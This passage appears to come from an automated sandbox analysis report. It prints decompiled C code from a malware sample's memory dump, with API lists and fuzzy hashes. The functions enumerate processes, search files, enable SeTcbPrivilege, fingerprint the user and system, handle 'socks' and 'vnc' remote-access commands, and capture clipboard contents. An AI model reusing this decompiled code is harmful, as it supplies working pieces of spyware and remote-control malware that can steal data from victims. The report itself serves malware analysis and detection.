					_v20 = _t42;
					_v24 = _t71;
					if(_t42 == 0xffffffff) {
						break;
					} else {
						_t45 =  &_v588;
						_v588 = 0x22c;
						Process32FirstW(_v20, _t45);
					}
					while(_t45 != 0) {
						_t65 = _v580;
						if(_t65 <= _t71 || _t65 ==  *0x423dd0) {
							L20:
							_t45 = Process32NextW(_v20,  &_v588);
							continue;
						} else {
							_t47 = 0;
							if(_v12 <= _t71) {
								L8:
								_t48 = E0041C98A(_t65, _t70, _t65);
								_v28 = _t48;
								if(_t48 != _t71) {
									_t73 = OpenProcess(0x400, _t71, _v580);
									if(_t73 != _t71) {
										_t72 = E00413315(_t65, _t73,  &_v32);
										CloseHandle(_t73);
										if(_t72 != 0) {
											if(_v32 ==  *0x423b70 && GetLengthSid( *_t72) ==  *0x423b68 && E00411D6F( *((intOrPtr*)( *0x423b64)),  *_t72, _t56) == 0 && E00411C89(4 + _v12 * 4,  &_v16) != 0) {
												_t70 = _v12;
												_v12 = _v12 + 1;
												_v24 = _v24 + 1;
												 *((intOrPtr*)(_v16 + _v12 * 4)) = _v580;
												if(E004063F6(_v16, _v580, _v28) != 0) {
													_v5 = 1;
												}
											}
											E00411CFE(_t72);
										}
										_t71 = 0;
									}
									CloseHandle(_v28);
								}
								goto L20;
							} else {
								goto L6;
							}
							while(1) {
								L6:
								_t70 = _v16;
								if( *((intOrPtr*)(_v16 + _t47 * 4)) == _t65) {
									goto L20;
								}
								_t47 = _t47 + 1;
								if(_t47 < _v12) {
									continue;
								}
								goto L8;
							}
							goto L20;
						}
					}
					CloseHandle(_v20);
					if(_v24 != _t71) {
						continue;
					}
					break;
				}
				E00411CFE(_v16);
				return _v5;
			}

0x00406491
0x00406493
0x00406497
0x0040649a
0x0040649d
0x004064a0
0x004064a6
0x004064a9
0x004064af
0x00000000
0x004064b5
0x004064b5
0x004064bf
0x004064c9
0x004064c9
0x004065d3
0x004064d4
0x004064dc
0x004065c3
0x004065cd
0x00000000
0x004064ee
0x004064ee
0x004064f3
0x00406507
0x00406508
0x0040650d
0x00406512
0x0040652a
0x0040652e
0x0040653f
0x00406541
0x00406545
0x00406550
0x0040658b
0x0040659a
0x0040659d
0x004065a0
0x004065b0
0x004065b2
0x004065b2
0x004065b0
0x004065b7
0x004065b7
0x004065bc
0x004065bc
0x004065c1
0x004065c1
0x00000000
0x00000000
0x00000000
0x00000000
0x004064f5
0x004064f5
0x004064f5
0x004064fb
0x00000000
0x00000000
0x00406501
0x00406505
0x00000000
0x00000000
0x00000000
0x00406505
0x00000000
0x004064f5
0x004064dc
0x004065de
0x004065e3
0x00000000
0x00000000
0x00000000
0x004065e3
0x004065ec
0x004065f8

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 004064A0
Process32FirstW.KERNEL32(?,?), ref: 004064C9
OpenProcess.KERNEL32(00000400,00000000,?,?,?,73BCF560,00000000), ref: 00406524
CloseHandle.KERNEL32(00000000,00000000,?,?,73BCF560,00000000), ref: 00406541
GetLengthSid.ADVAPI32(00000000,?,73BCF560,00000000), ref: 00406554
CloseHandle.KERNEL32(?,?,73BCF560,00000000), ref: 004065C1
Process32NextW.KERNEL32(?,0000022C), ref: 004065CD
CloseHandle.KERNEL32(?,?,73BCF560,00000000), ref: 004065DE

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseHandle$Process32$CreateFirstLengthNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 1981844004-0
Opcode ID: 266d705b7aa8b4249bb167674cd486ed258a4251f03e59072eee35543a84a0c2
Instruction ID: 57c7ff41533b20b63eacd6e89b5397b2eb780bd5c1eafbaca6970c36e374a01e
Opcode Fuzzy Hash: 266d705b7aa8b4249bb167674cd486ed258a4251f03e59072eee35543a84a0c2
Instruction Fuzzy Hash: D9417E30900119EFCF21DFA4DD849EEBBB5EF45304F1100AAE516B32A5DB399A95CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00417437, Relevance: 10.6, APIs: 7, Instructions: 109
sleepfilesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00417437(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
				short _v524;
				struct _WIN32_FIND_DATAW _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				void* _v1128;
				int _t51;
				signed int _t60;
				long _t68;
				signed char _t71;
				signed int _t83;

				_v1120 = __edx;
				_v1124 = __ecx;
				_t51 = E00417593("*",  &_v524, __ecx);
				if(_t51 == 0) {
					L25:
					return _t51;
				}
				_t51 = FindFirstFileW( &_v524,  &_v1116);
				_v1128 = _t51;
				if(_t51 != 0xffffffff) {
					_t71 = _a8;
					while(1) {
						_t83 = 0;
						if(_a20 != 0 && WaitForSingleObject(_a20, 0) != 0x102) {
							break;
						}
						if(E00417193( &(_v1116.cFileName)) != 0) {
							L23:
							if(FindNextFileW(_v1128,  &_v1116) != 0) {
								continue;
							}
							break;
						}
						_t60 = _v1116.dwFileAttributes & 0x00000010;
						if(_t60 == 0 || (_t71 & 0x00000002) == 0) {
							if(_t60 != _t83 || (_t71 & 0x00000004) == 0) {
								goto L17;
							} else {
								goto L10;
							}
						} else {
							L10:
							if(_a4 <= _t83) {
								L17:
								if((_v1116.dwFileAttributes & 0x00000010) != 0 && (_t71 & 0x00000001) != 0 && E00417593( &(_v1116.cFileName),  &_v524, _v1124) != 0) {
									_t103 = _a24;
									if(_a24 != 0) {
										Sleep(_a24);
									}
									E00417437( &_v524, _v1120, _t103, _a4, _t71, _a12, _a16, _a20, _a24, _a28);
								}
								goto L23;
							}
							while(PathMatchSpecW( &(_v1116.cFileName),  *(_v1120 + _t83 * 4)) == 0) {
								_t83 = _t83 + 1;
								if(_t83 < _a4) {
									continue;
								}
								goto L17;
							}
							_t68 = _a12(_a16);
							__eflags = _t68;
							if(_t68 == 0) {
								break;
							}
							__eflags = _a28;
							if(_a28 != 0) {
								Sleep(_a28);
							}
							goto L17;
						}
					}
					_t51 = FindClose(_v1128);
				}
			}

0x00417454
0x00417458
0x0041745c
0x00417463
0x0041758a
0x00417590
0x00417590
0x00417476
0x0041747c
0x00417483
0x00417489
0x00417492
0x00417492
0x00417497
0x00000000
0x00000000
0x004174b9
0x00417569
0x0041757a
0x00000000
0x00000000
0x00000000
0x0041757a
0x004174c3
0x004174c6
0x004174cf
0x00000000
0x00000000
0x00000000
0x00000000
0x004174d6
0x004174d6
0x004174d9
0x00417516
0x0041751b
0x0041753b
0x0041753f
0x00417544
0x00417544
0x00417564
0x00417564
0x00000000
0x0041751b
0x004174db
0x004174f1
0x004174f5
0x00000000
0x00000000
0x00000000
0x004174f7
0x00417504
0x00417507
0x00417509
0x00000000
0x00000000
0x0041750b
0x0041750f
0x00417514
0x00417514
0x00000000
0x0041750f
0x004174c6
0x00417584
0x00417584

APIs

Part of subcall function 00417593: PathCombineW.SHLWAPI(0041C47F,0041C47F,?,0041C47F,?,?), ref: 004175B2

FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00417476
WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0041749D
PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 004174E7
Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00417514
Sleep.KERNEL32(00000000,?,?), ref: 00417544
FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00417572
FindClose.KERNEL32(?,?,?,?,00000000), ref: 00417584

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
String ID:
API String ID: 2348139788-0
Opcode ID: bf3ad005bc328733986c04015d1054695fc310f33c329604b2563d4772e89571
Instruction ID: 4c0d70ad95ed53f30eda166063541bcf04ba4e17a4f0c29d14b8b1fb85d9b75d
Opcode Fuzzy Hash: bf3ad005bc328733986c04015d1054695fc310f33c329604b2563d4772e89571
Instruction Fuzzy Hash: 7641827100820AABCF21DF50CD44ADF7BB6FF44394F00892AF99492661D739C995CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004133CA, Relevance: 10.6, APIs: 7, Instructions: 52
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004133CA(WCHAR* _a4) {
				void* _v12;
				intOrPtr _v16;
				struct _TOKEN_PRIVILEGES _v28;
				int _t23;

				_t23 = 0;
				if(OpenThreadToken(GetCurrentThread(), 0x20, 0,  &_v12) != 0 || OpenProcessToken(0xffffffff, 0x20,  &_v12) != 0) {
					_v28.PrivilegeCount = 1;
					_v16 = 2;
					if(LookupPrivilegeValueW(_t23, _a4,  &(_v28.Privileges)) != 0 && AdjustTokenPrivileges(_v12, _t23,  &_v28, _t23, _t23, _t23) != 0 && GetLastError() == 0) {
						_t23 = 1;
					}
					CloseHandle(_v12);
					return _t23;
				} else {
					return 0;
				}
			}

0x004133d5
0x004133e9
0x00413408
0x00413410
0x0041341f
0x00413440
0x00413440
0x00413445
0x00000000
0x004133fd
0x00000000
0x004133fd

APIs

GetCurrentThread.KERNEL32 ref: 004133DA
OpenThreadToken.ADVAPI32(00000000,?,?,?,?,00410CA8,SeTcbPrivilege), ref: 004133E1
OpenProcessToken.ADVAPI32(000000FF,00000020,00410CA8,?,?,?,?,00410CA8,SeTcbPrivilege), ref: 004133F3
LookupPrivilegeValueW.ADVAPI32(00000000,00410CA8,?), ref: 00413417
AdjustTokenPrivileges.ADVAPI32(00410CA8,00000000,00000001,00000000,00000000,00000000), ref: 0041342C
GetLastError.KERNEL32 ref: 00413436
CloseHandle.KERNEL32(00410CA8), ref: 00413445

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
String ID:
API String ID: 2724707430-0
Opcode ID: eb187dacaacafc8ad968d47516990ea2ef505364459f9dcf90fad5767cd0e4a6
Instruction ID: 86993c23503910aa688197fae5bce8d39ad58bf23df9299211a48af639016522
Opcode Fuzzy Hash: eb187dacaacafc8ad968d47516990ea2ef505364459f9dcf90fad5767cd0e4a6
Instruction Fuzzy Hash: 25014CB1600209BFEB119FA0DD89EEF7BACEB04749F000076F501E1161E7398A849A69

Uniqueness

Uniqueness Score: -1.00%

Function 00412FA3, Relevance: 9.1, APIs: 6, Instructions: 53encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(004175DA,00000000,00000000,00000001,F0000040,00000000,004175DA,?,00000030,?,?,?,00417AF3,?), ref: 00412FBC
CryptCreateHash.ADVAPI32(00008003,00008003,00000000,00000000,?,?,?,00417AF3,?), ref: 00412FD4
CryptHashData.ADVAPI32(?,00000010), ref: 00412FF0
CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 00413008
CryptDestroyHash.ADVAPI32(?), ref: 0041301F
CryptReleaseContext.ADVAPI32(?,00000000,?,?,00417AF3,?), ref: 00413029

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
String ID:
API String ID: 3186506766-0
Opcode ID: 8c7b2e9c901c54fc573a1bdd9e64640e0d4f400bd6ae57e75fab373a6e69a197
Instruction ID: 3251579ac6a8d73fdc59e4810e561a704a85631c07bdb006a5ff6cc83c16105e
Opcode Fuzzy Hash: 8c7b2e9c901c54fc573a1bdd9e64640e0d4f400bd6ae57e75fab373a6e69a197
Instruction Fuzzy Hash: 2411127180024CBFEF119F90CD88EEEBF7DEB08381F008465F651A11A5D3368E94AB28

Uniqueness

Uniqueness Score: -1.00%

Function 00407242, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 189
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E00407242(char* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				char _v20;
				char _v64;
				char _v552;
				char _v556;
				short _v588;
				void* __ebx;
				void* __esi;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				signed short _t71;
				signed short _t75;
				void* _t92;
				void* _t95;
				void* _t97;
				signed short _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t109;
				signed int _t111;
				char* _t112;
				void* _t113;

				_t109 = __edx;
				_t106 = __ecx;
				_t111 = _a4;
				_t114 =  *_t111;
				_t99 = 1;
				_v5 = 0;
				if( *_t111 == 0) {
					_t97 = E004175EF(_t114);
					 *_t111 = _t97;
					if(_t97 == 0) {
						return 0;
					}
					_v5 = 1;
				}
				__eflags = _a8 & 0x00000001;
				if(__eflags == 0) {
					L9:
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) != 0) {
						_push( &_v12);
						_push(0x20000);
						_push(0x2713);
						_t105 = 4;
						_v12 = 0x1030809;
						_t99 = E00417603(_t111, _t105);
					}
					L11:
					__eflags = _a8 & 0x00000004;
					if((_a8 & 0x00000004) == 0) {
						L16:
						__eflags = _t99;
						if(_t99 == 0) {
							L32:
							__eflags = _v5 - 1;
							if(_v5 == 1) {
								E00411CFE( *_t111);
								 *_t111 =  *_t111 & 0x00000000;
								__eflags =  *_t111;
							}
							L34:
							return _t99;
						}
						__eflags = _a8 & 0x00000008;
						if((_a8 & 0x00000008) == 0) {
							L20:
							__eflags = _t99;
							if(_t99 == 0) {
								goto L32;
							}
							__eflags = _a8 & 0x00000010;
							if((_a8 & 0x00000010) == 0) {
								L28:
								__eflags = _t99;
								if(_t99 == 0) {
									goto L32;
								}
								__eflags = _a8 & 0x00000020;
								if((_a8 & 0x00000020) != 0) {
									E0040718E(_t106, _t111, 2);
									E0040718E(_t106, _t111, 0x17);
								}
								goto L34;
							}
							_t62 = GetModuleFileNameW(0,  &_v588, 0x103);
							_a4 = _t62;
							__eflags = _t62;
							if(_t62 != 0) {
								__eflags = 0;
								 *((short*)(_t113 + _t62 * 2 - 0x248)) = 0;
								_t106 =  &_v588;
								_t99 = E004176B0(_t62,  &_v588, _t109, 0, _t111, 0x271e);
							}
							_a4 = 0x104;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L32;
							} else {
								_t64 =  &_v588;
								__imp__GetUserNameExW(2, _t64,  &_a4);
								__eflags = _t64;
								if(_t64 != 0) {
									_t65 = _a4;
									__eflags = _t65;
									if(_t65 != 0) {
										__eflags = 0;
										 *((short*)(_t113 + _t65 * 2 - 0x248)) = 0;
										_t106 =  &_v588;
										_t99 = E004176B0(_t65,  &_v588, _t109, 0, _t111, 0x271f);
									}
								}
								goto L28;
							}
						}
						_t112 =  &_v20;
						E0041D6F3(_t112);
						_push(_t112);
						_push(0x20000);
						_push(0x271c);
						_t100 = 6;
						_t71 = E00417603(_a4, _t100);
						_t99 = _t71;
						__eflags = _t99;
						if(_t99 == 0) {
							_t111 = _a4;
							goto L32;
						}
						__imp__GetUserDefaultUILanguage();
						_v12 = _t71 & 0x0000ffff;
						_push( &_v12);
						_push(0x20000);
						_push(0x271d);
						_t101 = 2;
						_t75 = E00417603(_a4, _t101);
						_t111 = _a4;
						_t99 = _t75;
						goto L20;
					}
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = E00411E00();
					_push( &_v12);
					_push(0x20000);
					_push(0x2719);
					_t102 = 4;
					_t99 = E00417603(_t111, _t102);
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = E00411E28();
					_push( &_v12);
					_push(0x20000);
					_push(0x271b);
					_t103 = 4;
					_t99 = E00417603(_t111, _t103);
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = GetTickCount();
					_push( &_v12);
					_push(0x20000);
					_push(0x271a);
					_t104 = 4;
					_t99 = E00417603(_t111, _t104);
					goto L16;
				}
				_t92 = E0041CCFF(_t106,  &_v556);
				_t106 =  &_v552;
				_t99 = E004176B0(_t92,  &_v552, _t109, __eflags, _t111, 0x2711);
				__eflags = _t99;
				if(_t99 == 0) {
					goto L11;
				}
				_t95 = E0041CE5D( &_v552,  &_v64);
				__eflags = _v64;
				if(__eflags != 0) {
					_t106 =  &_v64;
					_t99 = E004176B0(_t95,  &_v64, _t109, __eflags, _t111, 0x2712);
				}
				__eflags = _t99;
				if(_t99 == 0) {
					goto L11;
				}
				goto L9;
			}

0x00407242
0x00407242
0x0040724d
0x00407250
0x00407254
0x00407256
0x0040725a
0x0040725c
0x00407261
0x00407265
0x00000000
0x00407267
0x0040726e
0x0040726e
0x00407272
0x0040727b
0x004072c4
0x004072c4
0x004072c8
0x004072cd
0x004072ce
0x004072cf
0x004072d6
0x004072d9
0x004072e5
0x004072e5
0x004072e7
0x004072e7
0x004072eb
0x00407360
0x00407360
0x00407362
0x00407465
0x00407465
0x00407469
0x0040746d
0x00407472
0x00407472
0x00407472
0x00407475
0x00000000
0x00407475
0x00407368
0x0040736c
0x004073ba
0x004073ba
0x004073bc
0x00000000
0x00000000
0x004073c2
0x004073c6
0x00407446
0x00407446
0x00407448
0x00000000
0x00000000
0x0040744a
0x0040744e
0x00407453
0x0040745b
0x0040745b
0x00000000
0x0040744e
0x004073d6
0x004073dc
0x004073df
0x004073e1
0x004073e3
0x004073ea
0x004073f3
0x004073fe
0x004073fe
0x00407400
0x00407407
0x00407409
0x00000000
0x0040740b
0x0040740f
0x00407418
0x0040741e
0x00407420
0x00407422
0x00407425
0x00407427
0x00407429
0x00407430
0x00407439
0x00407444
0x00407444
0x00407427
0x00000000
0x00407420
0x00407409
0x0040736e
0x00407371
0x00407378
0x0040737c
0x0040737d
0x00407384
0x00407385
0x0040738a
0x0040738c
0x0040738e
0x00407462
0x00000000
0x00407462
0x00407394
0x0040739d
0x004073a3
0x004073a7
0x004073a8
0x004073af
0x004073b0
0x004073b5
0x004073b8
0x00000000
0x004073b8
0x004072ed
0x004072ef
0x00000000
0x00000000
0x004072fa
0x00407300
0x00407301
0x00407302
0x00407309
0x00407311
0x00407313
0x00407315
0x00000000
0x00000000
0x00407320
0x00407326
0x00407327
0x00407328
0x0040732f
0x00407337
0x00407339
0x0040733b
0x00000000
0x00000000
0x00407347
0x0040734d
0x0040734e
0x0040734f
0x00407356
0x0040735e
0x00000000
0x0040735e
0x00407284
0x0040728f
0x0040729a
0x0040729c
0x0040729e
0x00000000
0x00000000
0x004072a4
0x004072a9
0x004072ae
0x004072b6
0x004072be
0x004072be
0x004072c0
0x004072c2
0x00000000
0x00000000
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00407341
GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,?,?,00000000), ref: 00407394
GetModuleFileNameW.KERNEL32(00000000,?,00000103,?,?,00000000), ref: 004073D6
GetUserNameExW.SECUR32(00000002,?,00000104), ref: 00407418

Strings

, xrefs: 0040744A

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: NameUser$CountDefaultFileLanguageModuleTick
String ID:
API String ID: 2256650695-3916222277
Opcode ID: 366d9ba63433488946bb1f2e3a0bc14662b945b2c4082d558aa209266f5e9f33
Instruction ID: 0433f83de7c9e87faa1f5151ceec0d177264c4d1dab00c7caf895b980bf3037f
Opcode Fuzzy Hash: 366d9ba63433488946bb1f2e3a0bc14662b945b2c4082d558aa209266f5e9f33
Instruction Fuzzy Hash: 8851D731E8824879D7219F65D849FDE7BA89F02314F04406AFE44BF3D2DB789984CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00419084, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 207
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00419084(void* __ecx, CHAR** _a4, signed int _a7) {
				signed int _v6;
				signed int _v8;
				char _v9;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				short _v30;
				intOrPtr _v36;
				char _v44;
				char _v304;
				char _v788;
				char _v792;
				void* __edi;
				void* __esi;
				int _t68;
				signed short _t70;
				signed int _t80;
				void* _t95;
				signed int _t99;
				void* _t102;
				signed int _t108;
				void* _t112;
				CHAR** _t121;
				signed int _t130;
				intOrPtr* _t131;
				intOrPtr* _t138;
				signed int _t139;
				void* _t141;

				_t123 = __ecx;
				E00411DB1( &_v304,  &_v304, 0, 0x104);
				_t121 = _a4;
				if(lstrcmpiA( *_t121, "socks") != 0) {
					_t68 = lstrcmpiA( *_t121, "vnc");
					__eflags = _t68;
					if(_t68 != 0) {
						_t70 = E0041237D( *_t121, _t123, 0);
						_t6 = _t70 - 1; // -1
						_t123 = _t6;
						__eflags = _t6 - 0xfffd;
						if(_t6 > 0xfffd) {
							L32:
							E00415E03( &_v304);
							_a7 = 0;
							if(_v304 <= 0) {
								L34:
								E00411CFE( *_t121);
								E00411CFE(_t121[1]);
								E00411CFE(_t121[2]);
								E004154D1(_t121[3]);
								E00411CFE(_t121);
								return 0;
							} else {
								goto L33;
							}
							do {
								L33:
								CloseHandle( *(_t141 + (_a7 & 0x000000ff) * 4 - 0x128));
								_a7 = _a7 + 1;
							} while (_a7 < _v304);
							goto L34;
						}
						_t80 = _t70 & 0x0000ffff;
						_v24 = _t80;
						__eflags = _t80;
						if(_t80 == 0) {
							goto L32;
						}
						L6:
						_t130 = E00414D87(E0041237D(_t121[2], _t123, 0), _t123, _t121[1]);
						_v16 = _t130;
						if(_t130 == 0xffffffff) {
							goto L32;
						}
						E004150F9(_t123, _t130);
						E004150B7(_t130);
						_t89 = E00412B55(E0041CCFF(_t123,  &_v792) | 0xffffffff,  &_v788,  &_v44);
						_t144 = _t89;
						if(_t89 == 0) {
							L31:
							E004150A1(_t89, _t130);
							goto L32;
						}
						_v9 = E004183A6( &_v788, _v36, _t144, _t130, 1, _v44);
						_t89 = E00412B43( &_v44);
						if(_v9 == 0) {
							goto L31;
						}
						_t89 = E00414FAE(0,  &_v16, 0, 0);
						_t130 = _v16;
						if(_t89 != _t130) {
							goto L31;
						}
						while(1) {
							_push(0x7530);
							_push( &_v8);
							_t95 = 4;
							if(E00414CB1(_t95, _t130) == 0 || _v8 <= 4) {
								break;
							}
							_t138 = E00411CCE(_v8 & 0x0000ffff);
							_push(0x7530);
							if(_t138 == 0) {
								_t127 = _v8 & 0x0000ffff;
								_t99 = (_v6 & 0x0000ffff) + (_v8 & 0x0000ffff) - 4;
								L29:
								_push(_t99);
								_push(_t130);
								_t89 = E00414CF9(_t127);
								break;
							}
							_push(_t138);
							_t127 = _t130;
							_t102 = E00414CB1((_v8 & 0x0000ffff) - 4, _t130);
							_push(_t138);
							if(_t102 == 0) {
								L35:
								_t89 = E00411CFE();
								break;
							}
							_v30 = _v6;
							_v28 =  *_t138;
							E00411CFE();
							if(_v6 != 0) {
								_t139 = E00411CCE(_v6 & 0x0000ffff);
								_t99 = _v6 & 0x0000ffff;
								_push(0x7530);
								__eflags = _t139;
								if(_t139 == 0) {
									goto L29;
								}
								_push(_t139);
								_t127 = _t130;
								_t108 = E00414CB1(_t99, _t130);
								__eflags = _t108;
								if(_t108 == 0) {
									_push(_t139);
									goto L35;
								}
								_v20 = _t139;
								L20:
								if(_v28 == 2 && _v30 == 4) {
									_t112 = 0xc;
									_t131 = E00411CCE(_t112);
									if(_t131 != 0) {
										 *_t131 = _a4;
										 *((intOrPtr*)(_t131 + 4)) = _v24;
										 *((intOrPtr*)(_t131 + 8)) =  *_v20;
										if(E00415DBE( &_v304, 0x20000, E00418DFB, _t131) == 0) {
											E00411CFE(_t131);
										}
									}
									E00415D6C(_t127,  &_v304);
								}
								E00411CFE(_v20);
								_t89 = E00414FAE(0,  &_v16, 0, 0);
								_t130 = _v16;
								if(_t89 == _t130) {
									continue;
								} else {
									break;
								}
							}
							_v20 = _v20 & 0x00000000;
							goto L20;
						}
						_t121 = _a4;
						goto L31;
					}
					_v24 = 0xfffffffe;
					goto L6;
				}
				_v24 = _v24 | 0xffffffff;
				goto L6;
			}

0x00419084
0x0041909e
0x004190a3
0x004190b7
0x004190c6
0x004190c8
0x004190ca
0x004190d9
0x004190de
0x004190de
0x004190e1
0x004190e7
0x004192c0
0x004192c6
0x004192d2
0x004192d6
0x004192f7
0x004192f9
0x00419301
0x00419309
0x00419311
0x00419317
0x00419322
0x00000000
0x00000000
0x00000000
0x004192d8
0x004192d8
0x004192e3
0x004192e9
0x004192ef
0x00000000
0x004192d8
0x004190ed
0x004190f0
0x004190f3
0x004190f5
0x00000000
0x00000000
0x004190fb
0x0041910d
0x0041910f
0x00419115
0x00000000
0x00000000
0x0041911c
0x00419122
0x0041913f
0x00419144
0x00419146
0x004192b9
0x004192bb
0x00000000
0x004192bb
0x0041915d
0x00419160
0x00419169
0x00000000
0x00000000
0x00419179
0x0041917e
0x00419183
0x00000000
0x00000000
0x0041918e
0x0041918e
0x00419192
0x00419195
0x0041919f
0x00000000
0x00000000
0x004191b9
0x004191bb
0x004191be
0x004192a7
0x004192ab
0x004192af
0x004192af
0x004192b0
0x004192b1
0x00000000
0x004192b1
0x004191cb
0x004191cc
0x004191ce
0x004191d3
0x004191d6
0x00419325
0x00419325
0x00000000
0x00419325
0x004191e0
0x004191e6
0x004191e9
0x004191f3
0x00419204
0x00419206
0x0041920a
0x0041920b
0x0041920d
0x00000000
0x00000000
0x00419213
0x00419214
0x00419216
0x0041921b
0x0041921d
0x0041932c
0x00000000
0x0041932c
0x00419223
0x00419226
0x0041922a
0x00419235
0x0041923b
0x0041923f
0x00419244
0x00419249
0x00419262
0x0041926c
0x0041926f
0x0041926f
0x0041926c
0x0041927a
0x0041927a
0x00419282
0x00419291
0x00419296
0x0041929b
0x00000000
0x004192a1
0x00000000
0x004192a1
0x0041929b
0x004191f5
0x00000000
0x004191f5
0x004192b6
0x00000000
0x004192b6
0x004190cc
0x00000000
0x004190cc
0x004190b9
0x00000000

APIs

lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 004190B3
lstrcmpiA.KERNEL32(?,vnc), ref: 004190C6
CloseHandle.KERNEL32(?), ref: 004192E3

Part of subcall function 00415DBE: SetLastError.KERNEL32(0000009B,0041CFF0,00000000,00419A3E,00000000,00423A58,00000000,00000104,73BCF560,00000000), ref: 00415DC8

Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11

Strings

vnc, xrefs: 004190BF
socks, xrefs: 004190AC

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: lstrcmpi$CloseErrorFreeHandleHeapLast
String ID: socks$vnc
API String ID: 3305036421-270151703
Opcode ID: 749aa6dfb44f3ea0b50b511457200b55f3952e562c7edc096cfd30fe8b7b6423
Instruction ID: 161428527012e6c9853b4de102439a08cb99e478cb02ac1ae5a3ff9e533e6a83
Opcode Fuzzy Hash: 749aa6dfb44f3ea0b50b511457200b55f3952e562c7edc096cfd30fe8b7b6423
Instruction Fuzzy Hash: 2A71F231900119BACF10AFA1C851BEE7BB5AF49714F14449BF945B7291DB3C8EC1CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041047C, Relevance: 7.6, APIs: 5, Instructions: 70
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041047C(void* _a4) {
				signed int _t11;
				void* _t21;
				void* _t23;
				void* _t24;
				int _t25;

				_t25 = _a4;
				_t23 = GetClipboardData(_t25);
				_a4 = _t23;
				if(E0041CB59() == 0) {
					return _t23;
				}
				if(_t23 == 0 || _t25 != 1 && _t25 != 0xd && _t25 != 7) {
					L20:
					return _a4;
				} else {
					_t21 = GlobalLock(_t23);
					if(_t21 == 0) {
						L19:
						goto L20;
					}
					_t11 = _t25 - 1;
					if(_t11 == 0) {
						_push(_t21);
						_push(0);
						L12:
						_t24 = E00411F3E(_t11 | 0xffffffff);
						L15:
						if(_t24 != 0) {
							EnterCriticalSection(0x422b14);
							E00410179(0x403398);
							E00410179(_t24);
							LeaveCriticalSection(0x422b14);
							if(_t24 != _t21) {
								E00411CFE(_t24);
							}
						}
						GlobalUnlock(_a4);
						goto L19;
					}
					_t11 = _t11 - 6;
					if(_t11 == 0) {
						_push(_t21);
						_push(1);
						goto L12;
					}
					if(_t11 != 6) {
						_t24 = _a4;
					} else {
						_t24 = _t21;
					}
					goto L15;
				}
			}

0x00410480
0x0041048b
0x0041048d
0x00410497
0x00000000
0x00410499
0x004104a2
0x0041052a
0x00000000
0x004104b7
0x004104bf
0x004104c3
0x00410529
0x00000000
0x00410529
0x004104c7
0x004104c8
0x004104e7
0x004104e8
0x004104db
0x004104e3
0x004104ef
0x004104f1
0x004104f9
0x00410504
0x0041050a
0x00410510
0x00410518
0x0041051b
0x0041051b
0x00410518
0x00410523
0x00000000
0x00410523
0x004104ca
0x004104cd
0x004104d8
0x004104d9
0x00000000
0x004104d9
0x004104d2
0x004104ec
0x004104d4
0x004104d4
0x004104d4
0x00000000
0x004104d2

APIs

